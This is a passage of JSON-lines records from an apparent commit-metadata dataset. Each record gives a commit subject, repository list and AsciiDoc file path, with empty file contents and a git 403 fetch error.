403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dd351f46017e29a92e979ee142b6e97ca882b250","subject":"Update 2016-04-07-Banner-grabbing.adoc","message":"Update 2016-04-07-Banner-grabbing.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Banner-grabbing.adoc","new_file":"_posts\/2016-04-07-Banner-grabbing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"509cae3a7528c16763fb07522cdc7d59b19fdde9","subject":"KUDU-661 Quickstart first draft","message":"KUDU-661 Quickstart first draft\n\nChange-Id: Iac6bcc7ad9eb280124339b4b7c0d1b281e6c4750\nReviewed-on: http:\/\/gerrit.sjc.cloudera.com:8080\/6175\nTested-by: jenkins\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\n","repos":"helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/quickstart.adoc","new_file":"docs\/quickstart.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8cc8ca12bba1bd546a2ec803d5c15d3950519de2","subject":"Update 2015-06-06-A-Re.adoc","message":"Update 2015-06-06-A-Re.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-06-06-A-Re.adoc","new_file":"_posts\/2015-06-06-A-Re.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2f5b6f2e63cd7b0bec59a1dd272600f9c00b08c","subject":"Update 2015-07-30-Lost.adoc","message":"Update 2015-07-30-Lost.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2015-07-30-Lost.adoc","new_file":"_posts\/2015-07-30-Lost.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5830a2e9646c769aaff0d2eb4a34c6aebd973b84","subject":"Update 2018-02-23-test.adoc","message":"Update 2018-02-23-test.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-test.adoc","new_file":"_posts\/2018-02-23-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4fe4a09818cd59414b955346fc95034f8f78df51","subject":"Update 2018-10-14-TEST.adoc","message":"Update 2018-10-14-TEST.adoc","repos":"TRex22\/blog,TRex22\/blog,TRex22\/blog","old_file":"_posts\/2018-10-14-TEST.adoc","new_file":"_posts\/2018-10-14-TEST.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TRex22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3fdce1d99c7fd2de06e29f175e698975ae26638a","subject":"Update 2015-09-10-The-books-every-developer-should-read.adoc","message":"Update 2015-09-10-The-books-every-developer-should-read.adoc","repos":"cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io","old_file":"_posts\/2015-09-10-The-books-every-developer-should-read.adoc","new_file":"_posts\/2015-09-10-The-books-every-developer-should-read.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cdelmas\/cdelmas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"147722a407e0b2a1b631b243d23061ac36eb0f46","subject":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","message":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"83f1781ac9e70096734c0b5e533bdcf144b1986d","subject":"Update index.adoc","message":"Update index.adoc\n\nTypo fix\n","repos":"xjrk58\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,lgscofield\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,cgvarela\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,pranavraman\/elasticsearch-hadoop,yonglehou\/elasticsearch-hadoop,kai5263499\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/yarn\/index.adoc","new_file":"docs\/src\/reference\/asciidoc\/yarn\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dd4e9516ad43a7d091996a2db68f32dc906fa610","subject":"constructors","message":"constructors\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/Local design.adoc","new_file":"Best practices\/Local design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7435613e2517a516413415d1f8c8da31d3462128","subject":"Update 2017-10-01-Probleme-eines-selbstorganisierten-Kollektivs.adoc","message":"Update 2017-10-01-Probleme-eines-selbstorganisierten-Kollektivs.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-10-01-Probleme-eines-selbstorganisierten-Kollektivs.adoc","new_file":"_posts\/2017-10-01-Probleme-eines-selbstorganisierten-Kollektivs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ef6e2035ec5790d7a23affbd32226f01acb8234","subject":"Update 2015-02-11-Test.adoc","message":"Update 2015-02-11-Test.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-11-Test.adoc","new_file":"_posts\/2015-02-11-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8571c31a15b5f316880c26d2f9d68af4d69e2c9d","subject":"Servlets overview","message":"Servlets overview\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Servlets.adoc","new_file":"Servlets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e833b521d27bd4fb5ae28cdf6400cd5b9656d75f","subject":"y2b create post YouTuber Edition Nest Cam","message":"y2b create post YouTuber Edition Nest Cam","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-05-11-YouTuber-Edition-Nest-Cam.adoc","new_file":"_posts\/2016-05-11-YouTuber-Edition-Nest-Cam.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76bb4a2c52a1db6a8863916d69f9e5653a5ee3db","subject":"Update 2016-01-26-Core-Java-Reading.adoc","message":"Update 2016-01-26-Core-Java-Reading.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-26-Core-Java-Reading.adoc","new_file":"_posts\/2016-01-26-Core-Java-Reading.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e957035d439ff08a2592f04da3dfde998c857b4","subject":"Update 2016-05-09-Home-Office-Setup.adoc","message":"Update 2016-05-09-Home-Office-Setup.adoc","repos":"chris1234p\/chris1234p.github.io,chris1234p\/chris1234p.github.io,chris1234p\/chris1234p.github.io,chris1234p\/chris1234p.github.io","old_file":"_posts\/2016-05-09-Home-Office-Setup.adoc","new_file":"_posts\/2016-05-09-Home-Office-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chris1234p\/chris1234p.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4931869246f4b42b3073ec151ff55d16eb7c3d99","subject":"y2b create post Ironman in real life?","message":"y2b create post Ironman in real life?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-09-18-Ironman-in-real-life.adoc","new_file":"_posts\/2014-09-18-Ironman-in-real-life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82d62f959967446c773566b720eb13ec94a36cb4","subject":"Update 2015-11-02-Multiples-of-3-and-5.adoc","message":"Update 2015-11-02-Multiples-of-3-and-5.adoc","repos":"Bulletninja\/bulletninja.github.io,Bulletninja\/bulletninja.github.io,Bulletninja\/bulletninja.github.io,Bulletninja\/bulletninja.github.io","old_file":"_posts\/2015-11-02-Multiples-of-3-and-5.adoc","new_file":"_posts\/2015-11-02-Multiples-of-3-and-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bulletninja\/bulletninja.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0dbd533cc75ca0dabe8fc808c8cdfcd9ac47b93f","subject":"Update 2018-07-19-P-H-P-Under-the-Hood.adoc","message":"Update 2018-07-19-P-H-P-Under-the-Hood.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-19-P-H-P-Under-the-Hood.adoc","new_file":"_posts\/2018-07-19-P-H-P-Under-the-Hood.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c148201d978ca9a5677ef0516085c837614eebdd","subject":"Update 2016-02-08-Install-skype-43037-on-Cent-O-S-R-H-E-L-Fedora.adoc","message":"Update 2016-02-08-Install-skype-43037-on-Cent-O-S-R-H-E-L-Fedora.adoc","repos":"theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io","old_file":"_posts\/2016-02-08-Install-skype-43037-on-Cent-O-S-R-H-E-L-Fedora.adoc","new_file":"_posts\/2016-02-08-Install-skype-43037-on-Cent-O-S-R-H-E-L-Fedora.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/theofilis\/theofilis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52950717e0c58a2e3aa6c196b682c3c31a41989e","subject":"Polish","message":"Polish\n","repos":"jmnarloch\/spring-boot,shakuzen\/spring-boot,jayarampradhan\/spring-boot,ollie314\/spring-boot,thomasdarimont\/spring-boot,kamilszymanski\/spring-boot,qerub\/spring-boot,tiarebalbi\/spring-boot,minmay\/spring-boot,spring-projects\/spring-boot,lucassaldanha\/spring-boot,htynkn\/spring-boot,scottfrederick\/spring-boot,dreis2211\/spring-boot,drumonii\/spring-boot,rweisleder\/spring-boot,habuma\/spring-boot,olivergierke\/spring-boot,jmnarloch\/spring-boot,habuma\/spring-boot,lenicliu\/spring-boot,eddumelendez\/spring-boot,minmay\/spring-boot,pvorb\/spring-boot,SaravananParthasarathy\/SPSDemo,felipeg48\/spring-boot,shangyi0102\/spring-boot,izeye\/spring-boot,deki\/spring-boot,mdeinum\/spring-boot,joshthornhill\/spring-boot,lenicliu\/spring-boot,wilkinsona\/spring-boot,bclozel\/spring-boot,mbenson\/spring-boot,chrylis\/spring-boot,habuma\/spring-boot,bbrouwer\/spring-boot,yangdd1205\/spring-boot,afroje-reshma\/spring-boot-sample,nebhale\/spring-boot,bijukunjummen\/spring-boot,drumonii\/spring-boot,lucassaldanha\/spring-boot,mosoft521\/spring-boot,vpavic\/spring-boot,cleverjava\/jenkins2-course-spring-boot,spring-projects\/spring-boot,chrylis\/spring-boot,ollie314\/spring-boot,brettwooldridge\/spring-boot,lexandro\/spring-boot,zhanhb\/spring-boot,candrews\/spring-boot,kdvolder\/spring-boot,kdvolder\/spring-boot,bijukunjummen\/spring-boot,bjornlindstrom\/spring-boot,vpavic\/spring-boot,DeezCashews\/spring-boot,RichardCSantana\/spring-boot,drumonii\/spring-boot,habuma\/spring-boot,i007422\/jenkins2-course-spring-boot,jxblum\/spring-boot,jayarampradhan\/spring-boot,lenicliu\/spring-boot,nebhale\/spring-boot,brettwooldridge\/spring-boot,linead\/spring-boot,joshiste\/spring-boot,mosoft521\/spring-boot,michael-simons\/spring-boot,lucassaldanha\/spring-boot,isopov\/spring-boot,philwebb\/spring-boot-concourse,yhj630520\/spring-boot,tiarebalbi\/spring-boot,akmaharshi\/jenkins,dreis2211\/spring-boot,NetoDevel\/spring-boot,isopov\/spring-boot,tsachev\/spring-boot,sebastiankirsch\/spring-boot,yhj630520\/spring-boot,vpavic\/spring-boot,lburgazzoli\/spring-boot,wilkinsona\/spring-boot,izeye\/spring-boot,felipeg48\/spring-boot,isopov\/spring-boot,htynkn\/spring-boot,scottfrederick\/spring-boot,javyzheng\/spring-boot,deki\/spring-boot,mosoft521\/spring-boot,rweisleder\/spring-boot,isopov\/spring-boot,ihoneymon\/spring-boot,michael-simons\/spring-boot,philwebb\/spring-boot,philwebb\/spring-boot-concourse,jbovet\/spring-boot,jvz\/spring-boot,hqrt\/jenkins2-course-spring-boot,DeezCashews\/spring-boot,bjornlindstrom\/spring-boot,afroje-reshma\/spring-boot-sample,vakninr\/spring-boot,yhj630520\/spring-boot,mdeinum\/spring-boot,bbrouwer\/spring-boot,linead\/spring-boot,ollie314\/spring-boot,ptahchiev\/spring-boot,hqrt\/jenkins2-course-spring-boot,lburgazzoli\/spring-boot,mdeinum\/spring-boot,vpavic\/spring-boot,michael-simons\/spring-boot,drumonii\/spring-boot,tiarebalbi\/spring-boot,tiarebalbi\/spring-boot,mbenson\/spring-boot,ilayaperumalg\/spring-boot,xiaoleiPENG\/my-project,mbogoevici\/spring-boot,ihoneymon\/spring-boot,mbogoevici\/spring-boot,ptahchiev\/spring-boot,thomasdarimont\/spring-boot,jayarampradhan\/spring-boot,eddumelendez\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,habuma\/spring-boot,ptahchiev\/spring-boot,philwebb\/spring-boot-concourse,NetoDevel\/spring-boot,hello2009chen\/spring-boot,candrews\/spring-boot,tsachev\/spring-boot,neo4j-contrib\/spring-boot,scottfrederick\/spring-boot,brettwooldridge\/spring-boot,ilayaperumalg\/spring-boot,eddumelendez\/spring-boot,joshthornhill\/spring-boot,joshiste\/spring-boot,Buzzardo\/spring-boot,zhanhb\/spring-boot,cleverjava\/jenkins2-course-spring-boot,jvz\/spring-boot,dreis2211\/spring-boot,olivergierke\/spring-boot,Nowheresly\/spring-boot,brettwooldridge\/spring-boot,lburgazzoli\/spring-boot,kdvolder\/spring-boot,lenicliu\/spring-boot,SaravananParthasarathy\/SPSDemo,sebastiankirsch\/spring-boot,lenicliu\/spring-boot,michael-simons\/spring-boot,nebhale\/spring-boot,minmay\/spring-boot,donhuvy\/spring-boot,javyzheng\/spring-boot,rweisleder\/spring-boot,bjornlindstrom\/spring-boot,donhuvy\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,Nowheresly\/spring-boot,shangyi0102\/spring-boot,kamilszymanski\/spring-boot,mdeinum\/spring-boot,tiarebalbi\/spring-boot,RichardCSantana\/spring-boot,deki\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,kdvolder\/spring-boot,hello2009chen\/spring-boot,htynkn\/spring-boot,Nowheresly\/spring-boot,chrylis\/spring-boot,brettwooldridge\/spring-boot,hello2009chen\/spring-boot,linead\/spring-boot,jxblum\/spring-boot,donhuvy\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,bjornlindstrom\/spring-boot,nebhale\/spring-boot,jbovet\/spring-boot,deki\/spring-boot,neo4j-contrib\/spring-boot,spring-projects\/spring-boot,bijukunjummen\/spring-boot,zhanhb\/spring-boot,i007422\/jenkins2-course-spring-boot,philwebb\/spring-boot,philwebb\/spring-boot,aahlenst\/spring-boot,ollie314\/spring-boot,lexandro\/spring-boot,herau\/spring-boot,mbenson\/spring-boot,dreis2211\/spring-boot,sebastiankirsch\/spring-boot,chrylis\/spring-boot,shangyi0102\/spring-boot,kdvolder\/spring-boot,bjornlindstrom\/spring-boot,lucassaldanha\/spring-boot,vakninr\/spring-boot,pvorb\/spring-boot,candrews\/spring-boot,felipeg48\/spring-boot,aahlenst\/spring-boot,zhanhb\/spring-boot,lexandro\/spring-boot,herau\/spring-boot,joshthornhill\/spring-boot,akmaharshi\/jenkins,yhj630520\/spring-boot,aahlenst\/spring-boot,michael-simons\/spring-boot,vakninr\/spring-boot,NetoDevel\/spring-boot,ilayaperumalg\/spring-boot,drumonii\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,spring-projects\/spring-boot,yhj630520\/spring-boot,izeye\/spring-boot,olivergierke\/spring-boot,neo4j-contrib\/spring-boot,htynkn\/spring-boot,rweisleder\/spring-boot,pvorb\/spring-boot,mosoft521\/spring-boot,joshiste\/spring-boot,cleverjava\/jenkins2-course-spring-boot,bbrouwer\/spring-boot,qerub\/spring-boot,thomasdarimont\/spring-boot,joshthornhill\/spring-boot,joshthornhill\/spring-boot,shakuzen\/spring-boot,shakuzen\/spring-boot,ptahchiev\/spring-boot,jayarampradhan\/spring-boot,hqrt\/jenkins2-course-spring-boot,drumonii\/spring-boot,ilayaperumalg\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,joshiste\/spring-boot,ptahchiev\/spring-boot,minmay\/spring-boot,jmnarloch\/spring-boot,felipeg48\/spring-boot,bbrouwer\/spring-boot,RichardCSantana\/spring-boot,linead\/spring-boot,donhuvy\/spring-boot,mbenson\/spring-boot,afroje-reshma\/spring-boot-sample,spring-projects\/spring-boot,cleverjava\/jenkins2-course-spring-boot,ilayaperumalg\/spring-boot,htynkn\/spring-boot,afroje-reshma\/spring-boot-sample,candrews\/spring-boot,jbovet\/spring-boot,spring-projects\/spring-boot,mbenson\/spring-boot,xiaoleiPENG\/my-project,jxblum\/spring-boot,qerub\/spring-boot,SaravananParthasarathy\/SPSDemo,vpavic\/spring-boot,scottfrederick\/spring-boot,philwebb\/spring-boot,eddumelendez\/spring-boot,chrylis\/spring-boot,izeye\/spring-boot,akmaharshi\/jenkins,hqrt\/jenkins2-course-spring-boot,kamilszymanski\/spring-boot,mbogoevici\/spring-boot,nebhale\/spring-boot,joshiste\/spring-boot,htynkn\/spring-boot,sbcoba\/spring-boot,jvz\/spring-boot,neo4j-contrib\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,olivergierke\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,linead\/spring-boot,felipeg48\/spring-boot,Buzzardo\/spring-boot,bclozel\/spring-boot,mdeinum\/spring-boot,qerub\/spring-boot,aahlenst\/spring-boot,jxblum\/spring-boot,shakuzen\/spring-boot,NetoDevel\/spring-boot,pvorb\/spring-boot,scottfrederick\/spring-boot,royclarkson\/spring-boot,mbogoevici\/spring-boot,herau\/spring-boot,ptahchiev\/spring-boot,zhanhb\/spring-boot,javyzheng\/spring-boot,royclarkson\/spring-boot,vakninr\/spring-boot,ihoneymon\/spring-boot,rweisleder\/spring-boot,i007422\/jenkins2-course-spring-boot,tiarebalbi\/spring-boot,lucassaldanha\/spring-boot,chrylis\/spring-boot,habuma\/spring-boot,RichardCSantana\/spring-boot,javyzheng\/spring-boot,mdeinum\/spring-boot,felipeg48\/spring-boot,lexandro\/spring-boot,bclozel\/spring-boot,SaravananParthasarathy\/SPSDemo,pvorb\/spring-boot,philwebb\/spring-boot-concourse,scottfrederick\/spring-boot,ollie314\/spring-boot,hello2009chen\/spring-boot,bbrouwer\/spring-boot,bclozel\/spring-boot,kamilszymanski\/spring-boot,xiaoleiPENG\/my-project,NetoDevel\/spring-boot,tsachev\/spring-boot,Buzzardo\/spring-boot,tsachev\/spring-boot,philwebb\/spring-boot,xiaoleiPENG\/my-project,lburgazzoli\/spring-boot,ihoneymon\/spring-boot,jmnarloch\/spring-boot,donhuvy\/spring-boot,minmay\/spring-boot,SaravananParthasarathy\/SPSDemo,mevasaroj\/jenkins2-course-spring-boot,thomasdarimont\/spring-boot,xiaoleiPENG\/my-project,jbovet\/spring-boot,javyzheng\/spring-boot,mbogoevici\/spring-boot,donhuvy\/spring-boot,herau\/spring-boot,mosoft521\/spring-boot,Buzzardo\/spring-boot,i007422\/jenkins2-course-spring-boot,michael-simons\/spring-boot,isopov\/spring-boot,i007422\/jenkins2-course-spring-boot,jxblum\/spring-boot,aahlenst\/spring-boot,bclozel\/spring-boot,ilayaperumalg\/spring-boot,Buzzardo\/spring-boot,sebastiankirsch\/spring-boot,shakuzen\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,sbcoba\/spring-boot,philwebb\/spring-boot,joshiste\/spring-boot,afroje-reshma\/spring-boot-sample,shangyi0102\/spring-boot,olivergierke\/spring-boot,Nowheresly\/spring-boot,hello2009chen\/spring-boot,zhanhb\/spring-boot,royclarkson\/spring-boot,ihoneymon\/spring-boot,tsachev\/spring-boot,akmaharshi\/jenkins,jxblum\/spring-boot,hqrt\/jenkins2-course-spring-boot,eddumelendez\/spring-boot,jmnarloch\/spring-boot,sbcoba\/spring-boot,aahlenst\/spring-boot,shangyi0102\/spring-boot,wilkinsona\/spring-boot,vakninr\/spring-boot,akmaharshi\/jenkins,wilkinsona\/spring-boot,vpavic\/spring-boot,cleverjava\/jenkins2-course-spring-boot,RichardCSantana\/spring-boot,bclozel\/spring-boot,deki\/spring-boot,lburgazzoli\/spring-boot,kdvolder\/spring-boot,DeezCashews\/spring-boot,wilkinsona\/spring-boot,bijukunjummen\/spring-boot,Nowheresly\/spring-boot,lexandro\/spring-boot,dreis2211\/spring-boot,herau\/spring-boot,jvz\/spring-boot,sebastiankirsch\/spring-boot,yangdd1205\/spring-boot,rweisleder\/spring-boot,sbcoba\/spring-boot,bijukunjummen\/spring-boot,jvz\/spring-boot,qerub\/spring-boot,jbovet\/spring-boot,royclarkson\/spring-boot,royclarkson\/spring-boot,isopov\/spring-boot,wilkinsona\/spring-boot,Buzzardo\/spring-boot,philwebb\/spring-boot-concourse,neo4j-contrib\/spring-boot,ihoneymon\/spring-boot,izeye\/spring-boot,tsachev\/spring-boot,jayarampradhan\/spring-boot,mbenson\/spring-boot,dreis2211\/spring-boot,kamilszymanski\/spring-boot,DeezCashews\/spring-boot,eddumelendez\/spring-boot,DeezCashews\/spring-boot,yangdd1205\/spring-boot,sbcoba\/spring-boot,candrews\/spring-boot,shakuzen\/spring-boot,thomasdarimont\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"38ae986d98a749a7de01fcac6ae820bb1a72b806","subject":"y2b create post Upgrade Your Macbook Pro (SSD Upgrade, RAM Upgrade, Optical Drive Bay Adapter)","message":"y2b create post Upgrade Your Macbook Pro (SSD Upgrade, RAM Upgrade, Optical Drive Bay Adapter)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-12-28-Upgrade-Your-Macbook-Pro-SSD-Upgrade-RAM-Upgrade-Optical-Drive-Bay-Adapter.adoc","new_file":"_posts\/2012-12-28-Upgrade-Your-Macbook-Pro-SSD-Upgrade-RAM-Upgrade-Optical-Drive-Bay-Adapter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40666d7099d8ec12e8c67ec344c39ea2eb99ce93","subject":"#50 Move changelog to git repo","message":"#50 Move changelog to git repo\n","repos":"vjuranek\/radargun-plugin,jenkinsci\/radargun-plugin,vjuranek\/radargun-plugin,jenkinsci\/radargun-plugin,jenkinsci\/radargun-plugin,vjuranek\/radargun-plugin","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vjuranek\/radargun-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"104f7753182c5b09a905d8a6dd72df6f97f7e15b","subject":"y2b create post iPhone 5 Black vs iPhone 5 White (Should you buy the iPhone 5 Black or White?)","message":"y2b create post iPhone 5 Black vs iPhone 5 White (Should you buy the iPhone 5 Black or White?)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-09-24-iPhone-5-Black-vs-iPhone-5-White-Should-you-buy-the-iPhone-5-Black-or-White.adoc","new_file":"_posts\/2012-09-24-iPhone-5-Black-vs-iPhone-5-White-Should-you-buy-the-iPhone-5-Black-or-White.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab20418bc5b59c1c9bf047907a985838bc96a8c7","subject":"Renamed '_posts\/2016-11-14-My-English-Title.adoc' to '_posts\/2016-11-14-Functional-IO-with-F-S-Streams.adoc'","message":"Renamed '_posts\/2016-11-14-My-English-Title.adoc' to '_posts\/2016-11-14-Functional-IO-with-F-S-Streams.adoc'","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-11-14-Functional-IO-with-F-S-Streams.adoc","new_file":"_posts\/2016-11-14-Functional-IO-with-F-S-Streams.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e214cfd0c2e0dfa5a239cde8539ce76cfac72a2","subject":"wip on externs guide","message":"wip on externs guide\n","repos":"clojure\/clojurescript-site","old_file":"content\/guides\/externs.adoc","new_file":"content\/guides\/externs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 